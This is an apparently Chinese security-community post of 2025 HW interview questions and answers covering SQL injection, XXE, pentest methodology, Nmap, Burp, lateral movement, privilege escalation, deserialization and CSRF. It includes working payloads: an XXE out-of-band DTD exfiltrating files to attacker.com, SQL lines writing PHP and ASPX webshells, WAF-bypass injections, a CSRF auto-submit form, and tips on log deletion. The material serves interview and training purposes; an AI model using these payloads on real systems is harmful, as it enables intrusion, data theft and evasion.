安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 46
1、自我介绍 2、owasp top10 漏洞你最熟悉那些 3、请下sql注入原理 ,盲注常用那些函数,绕waf的手段有那些 4、XXE原理,XXE实现过程,XXE页面没有回显怎么解决,XXE可以getshell不 5、完整的渗透思路 6、你知道Nmap那些参数 (三次握手是用哪个参数) 7、BURP 常用的模块 8、知道内网渗透吗?拿到webshell入侵内网第一步该干什么 9、sql如何写shell 10、知道那些提权的方式,怎么提权的 10、命令执行常用函数 11、反序列化函数,java反序列化 用那些类 12、CSRF 原理 怎么防御 ,渗透思路 平时怎么挖漏洞的2. OWASP Top 10 漏洞熟悉点
- 注入漏洞(SQL/NoSQL/OS):数据库语句拼接导致的命令执行
- 失效的访问控制:越权访问(水平/垂直)、JWT 篡改
- XSS(跨站脚本):存储型危害最大,可窃取会话/钓鱼
- SSRF(服务端请求伪造):内网探测、云元数据利用
- XXE(XML外部实体):文件读取/内网探测(详见问题4)
- 反序列化漏洞:Java/PHP/.NET 对象构造触发RCE(详见问题11)
- 安全配置错误:默认凭证、目录列表、未更新补丁
3. SQL注入原理、盲注函数及WAF绕过
原理
攻击者通过篡改SQL查询结构,使应用执行恶意SQL语句(如
' OR 1=1--绕过登录)。盲注常用函数
数据库类型 函数示例 MySQL SUBSTR(),SLEEP(),IF(),BENCHMARK()MSSQL WAITFOR DELAY '0:0:5',CHAR(),PATINDEX()Oracle UTL_HTTP.REQUEST,DBMS_PIPE.RECEIVE_MESSAGE绕WAF手段
- 混淆编码:Hex/Base64/Unicode(如
SELECT→\x53\x45\x4C\x45\x43\x54)- 注释分割:
SEL/**/ECT,/*!50000SELECT*/(MySQL版本特化)- 参数污染:
id=1&id=2' UNION SELECT(利用后端解析差异)- 函数替代:
LIKE替代=,COALESCE()替代空格- HTTP参数污染:多参数干扰WAF检测逻辑
4. XXE漏洞全解析
原理
XML解析器未禁用外部实体引用,导致恶意实体被解析。
实现过程
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> <!-- 回显文件内容 -->无回显解决方案(OOB外带)
- 构造带外通道:
xml<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;- evil.dtd 内容:
dtd<!ENTITY % file SYSTEM "file:///secret.txt"> <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>"> %exfil;GetShell可能性
- 条件苛刻:需目标环境支持
expect://、jar://等危险协议(PHP环境为主)- 实战案例:通过
file:///proc/self/cwd/读取路径,结合上传漏洞实现RCE
5. 完整渗透思路(PTES标准流程)
- 信息收集
- 子域名爆破(Amass)、端口扫描(Nmap -sS)
- 指纹识别(Wappalyzer)、GitHub敏感信息泄露
- 漏洞扫描
- 主动扫描(Nessus/AWVS) + 手动验证(Burp Suite)
- 漏洞利用
- Web漏洞注入(SQLi/XSS/SSRF)
- 中间件漏洞(Tomcat RCE, Weblogic反序列化)
- 权限提升
- Linux:SUID/GTFOBins、内核提权(DirtyPipe)
- Windows:Token窃取、服务路径漏洞
- 内网横向移动
- 凭证抓取(Mimikatz)、SMB爆破(CrackMapExec)
- PTH(Pass-the-Hash)攻击
- 痕迹清除与报告
- 删除日志、上传清理脚本
6. Nmap常用参数
参数 用途 示例 -sSSYN扫描(半开放扫描) nmap -sS 192.168.1.1-sV服务版本探测 nmap -sV -p 80,443-O操作系统识别 nmap -O 192.168.1.0/24-A全面扫描(含OS/版本/脚本) nmap -A target.com-Pn跳过主机发现(穿透防火墙) nmap -Pn 10.10.11.12三次握手相关:
-sS(SYN扫描)仅发送SYN包,不完成TCP连接,规避日志记录。
7. Burp Suite常用模块
模块 核心功能 Proxy 拦截/修改HTTP流量(Repeater重放请求) Intruder 自动化攻击(爆破密码、枚举参数) Scanner 自动漏洞扫描(需Pro版) Decoder 编解码工具(Base64/URL/Hex) Collaborator 检测盲注/SSRF(DNS/HTTP外带)
8. 内网渗透第一步:信息收集与权限稳固
- 主机信息:
ipconfig /all(Windows) /ifconfig(Linux)systeminfo/uname -a- 网络拓扑:
- 路由追踪:
tracert 8.8.8.8- ARP表:
arp -a- 权限维持:
- 添加后门账户 / Webshell持久化
- 部署C2通道(Cobalt Strike/Meterpreter)
- 凭证获取:
- 内存抓密码(Mimikatz)
- 配置文件搜索(数据库连接字符串)
9. SQL写Webshell方法
条件:数据库有文件写权限 + 知晓绝对路径
- MySQL:
sqlSELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';- MSSQL:
sqlEXEC sp_makewebtask 'C:\inetpub\wwwroot\shell.aspx', '<?% @Page Language="Jscript"%><%eval(Request.Item["cmd"])%>';
10. 提权方式及命令执行函数
提权方式
类型 方法 系统漏洞 Windows:PrintNightmare、EternalBlue Linux:DirtyCow、Polkit-pkexec (CVE-2021-4034) 配置错误 SUID程序滥用(find/cp)、sudoers错误配置 服务漏洞 MySQL UDF提权、Redis写SSH公钥 命令执行函数
语言 危险函数示例 PHP system(),exec(),passthru(),shell_exec()Java Runtime.getRuntime().exec()Python os.system(),subprocess.Popen()
11. 反序列化漏洞核心
反序列化函数
- PHP:
unserialize()- Java:
ObjectInputStream.readObject()- Python:
pickle.loads()Java反序列化Gadget类
库/组件 利用链类示例 Commons-Collections InvokerTransformer,ConstantTransformerJDK AnnotationInvocationHandlerGroovy MethodClosureFastjson JdbcRowSetImpl(JNDI注入)
12. CSRF漏洞与渗透技巧
原理
诱使用户在已登录状态下执行非预期操作(如转账
POST /transfer?to=hacker&amount=10000)。防御方案
- Token验证:表单添加随机Token(同源策略保护)
- SameSite Cookie:设置
Strict或Lax模式- 验证Referer:检查请求来源域名
渗透思路
- 检测:Burp生成CSRF PoC,观察是否缺少Token/Referer检查
- 利用:
html<form action="http://bank.com/transfer" method="POST"> <input type="hidden" name="to" value="hacker"> <input type="hidden" name="amount" value="10000"> </form> <script>document.forms[0].submit();</script>漏洞挖掘方法
- 自动化扫描:Burp Suite + CSRF Scanner插件
- 手动测试:
- 删除Token参数观察是否仍可请求
- 替换Referer为其他域名测试
- 业务逻辑深挖:关注敏感操作(密码修改、邮箱绑定)